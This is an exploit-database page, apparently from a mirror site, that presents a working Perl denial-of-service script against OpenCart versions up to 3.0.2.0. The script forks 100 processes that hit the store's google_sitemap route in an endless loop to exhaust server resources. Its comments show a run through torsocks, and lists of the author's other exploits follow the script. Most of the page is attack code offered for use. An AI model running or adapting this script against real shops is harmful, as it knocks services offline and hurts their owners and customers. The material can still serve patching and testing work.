Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Opencart < 3.0.2.0 - Denial of Service"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

php

Release date

Exploit published date

2018-06-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/perl -w
#
#  Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg
#
#  Tested store with added more than 1000 products
#
#  [[email protected] cartkiller]# torsocks perl killcart.pl example.com
#  Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)
#  Connecting example.com with 80 forks..
#  Bye, bye and good night..
#  Bye, bye and good night..
#  Bye, bye and good night..
#  ^C
#  [[email protected] cartkiller]# 
#
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  This exploit is buggy and proof of concept
# 
use Parallel::ForkManager;
use LWP;
print "Opencart <= 3.0.2.0 google_sitemap Remote Denial of Service (resource exhaustion)\n";
sub usage{
    print "usg: perl $0 <host>\n";
    print "exmpl: perl $0 www.example.com\n";
    print "https://ethical-hacker.org/\n";
    print "https://facebook.com/ethicalhackerorg\n";
    print "Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>\n";
}
if ($#ARGV < 0) {
    usage;
    exit;
}
my $numforks = 100;
print "Connecting $ARGV[0] with $numforks forks..\n";
sub killcart{
my $pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
for ($k=0;$k<$numforks;$k++) {
$pm->start and next;   
my $browser  = LWP::UserAgent ->new(ssl_opts => { verify_hostname => 0 },protocols_allowed => ['https']);
#   $browser->timeout(20);
   $browser->agent('Mozilla/5.0');
my $response = $browser->get("https://$ARGV[0]/index.php?route=extension/feed/google_sitemap");
print "Loop detected: Opencart is still vulnerable but seems server is correct configured. Change forks.\n" if($response->code eq 508);
print "Kill me! Google_Sitemap is turned off..\n" if($response->code eq 404);
print "Bye, bye and good night..\n" if(($response->code eq 503 or $response->code eq 504));
$pm->finish;
}
$pm->wait_all_children;
}
while(1) {
killcart();
}
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-02-24 "SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-19 "DBPower C300 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2019-10-08 "Zabbix 4.4 - Authentication Bypass" webapps php "Todor Donev"
2019-09-23 "Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure" remote hardware "Todor Donev"
2019-09-09 "WordPress 5.2.3 - Cross-Site Host Modification" webapps php "Todor Donev"
2019-09-02 "IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read" remote hardware "Todor Donev"
2019-09-02 "Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection" remote hardware "Todor Donev"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2018-07-11 "Awk to Perl 1.007-5 - Buffer Overflow (PoC)" local linux "Todor Donev"
2018-06-22 "Opencart < 3.0.2.0 - Denial of Service" dos php "Todor Donev"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2018-01-17 "D-Link DSL-2640R - DNS Change" webapps hardware "Todor Donev"
2017-06-18 "D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change" webapps hardware "Todor Donev"
2017-06-17 "UTstarcom WA3002G4 - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "D-Link DSL-2640U - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "Beetel BCM96338 Router - DNS Change" webapps hardware "Todor Donev"
2017-06-16 "iBall Baton iB-WRA150N - DNS Change" webapps hardware "Todor Donev"
2017-01-22 "SunOS 5.11 ICMP - Denial of Service" dos unix "Todor Donev"
2017-01-19 "Pirelli DRG A115 v3 ADSL Router - DNS Change" webapps hardware "Todor Donev"
2017-01-19 "Tenda ADSL2/2+ Modem D820R - DNS Change" webapps hardware "Todor Donev"
2017-01-16 "Pirelli DRG A115 ADSL Router - DNS Change" webapps hardware "Todor Donev"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44927/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.